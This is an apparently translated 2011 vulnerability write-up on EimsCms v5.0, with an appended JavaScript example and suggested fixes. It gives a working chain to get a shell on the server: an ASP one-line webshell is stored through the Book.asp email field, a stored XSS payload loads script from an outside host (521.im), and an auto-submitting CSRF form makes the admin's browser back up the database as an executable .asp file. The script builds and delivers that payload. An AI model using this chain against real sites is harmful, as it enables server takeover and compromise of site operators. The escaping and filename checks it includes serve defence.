EimsCms v5.0 XSS+CSRF=GetShell - vulnerability warning - 黑吧安全网 (myhack58)

2011-01-29T00:00:00
ID MYHACK58:62201128968
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-01-29T00:00:00

Description


EimsCms v5.0 XSS+CSRF=GetShell

Author: B0mbErM@n

Time:2011-01-28

------ GetShell -----

[1] In Book.asp, enter a one-sentence (一句话) ASP webshell in the email field and submit it; it is stored in the Access database.
[2] In Book.asp, enter the XSS payload that triggers the CSRF in the email field and submit it.
[3] Wait for the administrator to trigger the XSS. The CSRF makes the backend back up the database to bem.asp, so the stored webshell is now served as an ASP page; connect the one-sentence-webshell client to bem.asp.
[Requirements] The backend admin directory and the database path are at their defaults (/admin/ and ../Data/eimsCMS.mdb, as used in the CSRF form below).
[Note] The administrator triggers the XSS when viewing comments in the backend.

------ XSS -----

Book.asp: write the XSS payload in the email field. The XSS can then be used to fire the CSRF; for example, put the CSRF form into a JS file and submit <SCRIPT SRC=http://521.im/xss.js></SCRIPT> as the email.

----- CSRF -----

<form method="post" action="http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart">
  <input name="olddata" type="text" id="olddata" value="../Data/eimsCMS.mdb" size="45" readonly>
  <input name="newdata" type="text" id="newdata" size="45" value="../bem.asp">
  <input type="submit" name="Submit" value="Start Backup" id="bem" />
</form>
<script>
  document.getElementById('bem').click();
</script>

----- Analysis -----

Book.asp does not escape special characters such as < and > in the email field (or similar fields), so the submitted payload is stored and rendered unfiltered. The backup function in DataM.asp additionally accepts any target filename, which is why the database copy can be written as an executable .asp file.
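The following is an added example, not code from the original write-up or from EimsCms: it ties the XSS section, the CSRF section and the analysis together in one script. It builds the email-field payload and the self-submitting backup form that xss.js would carry, delivers it when running in a browser, and shows the two server-side checks (escaping the email field, restricting the backup filename) that would break the chain. The host 127.0.0.1:99, the /admin/ directory, the ../Data/eimsCMS.mdb path and the 521.im URL are taken from the write-up; the check functions are assumptions about what a fix would look like, not EimsCms's own code.

```javascript
// Added example: stored XSS in Book.asp -> CSRF against DataM.asp backup.
// Target values below are the ones used in the write-up's CSRF form.
const TARGET = 'http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart';

// Minimal HTML escaping. This is what Book.asp should apply to the email
// field before storing/rendering it (classic ASP: Server.HTMLEncode(email)).
// Assumed fix, not EimsCms code.
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// The string the attacker submits as the "email" in Book.asp. Because the
// field is stored unescaped, the admin's browser executes it when the
// backend comment list is rendered.
function xssEmailPayload(jsUrl) {
  return `<SCRIPT SRC=${jsUrl}></SCRIPT>`;
}

// Contents of xss.js: the DataM.asp backup form with the .asp target name,
// auto-submitted in the administrator's authenticated session.
function buildBackupCsrf({
  action = TARGET,
  olddata = '../Data/eimsCMS.mdb',
  newdata = '../bem.asp',
} = {}) {
  const fields = { olddata, newdata, Submit: 'Start Backup' };
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${htmlEscape(name)}" value="${htmlEscape(value)}">`)
    .join('\n  ');
  return `<form id="bem" method="post" action="${htmlEscape(action)}">\n  ${inputs}\n</form>\n` +
    `<script>document.getElementById('bem').submit();</script>`;
}

// Browser-only delivery (the xss.js context): inject the form and submit it.
// Scripts inserted via innerHTML do not run, so submit() is called directly.
// Under Node there is no DOM; the function then returns false.
function deliverInBrowser(html) {
  if (typeof document === 'undefined') return false;
  const div = document.createElement('div');
  div.style.display = 'none';
  div.innerHTML = html;
  document.body.appendChild(div);
  div.querySelector('form').submit();
  return true;
}

// What DataM.asp should enforce on "newdata" before copying the database
// (assumed fix): no path separators or traversal, and only an .mdb name,
// so the backup can never land as a server-executable .asp file.
function isSafeBackupName(name) {
  if (typeof name !== 'string' || name.length === 0 || name.length > 64) return false;
  if (/[\/\\]/.test(name) || name.includes('..')) return false; // no traversal
  return /^[A-Za-z0-9_-]+\.mdb$/.test(name);                    // .mdb only
}

// Stand-alone run: show the payload, the CSRF form, and the checks.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(xssEmailPayload('http://521.im/xss.js'));
  console.log(buildBackupCsrf());
  console.log('deliverInBrowser:', deliverInBrowser(buildBackupCsrf()));
  console.log('../bem.asp allowed?', isSafeBackupName('../bem.asp'));
  console.log('eimsCMS_backup.mdb allowed?', isSafeBackupName('eimsCMS_backup.mdb'));
}
```

A CSRF token on the backup form would also stop this particular chain, but it does not remove the root causes: the unescaped email field (stored XSS) and the unrestricted backup filename (arbitrary .asp write). The two checks above address those directly.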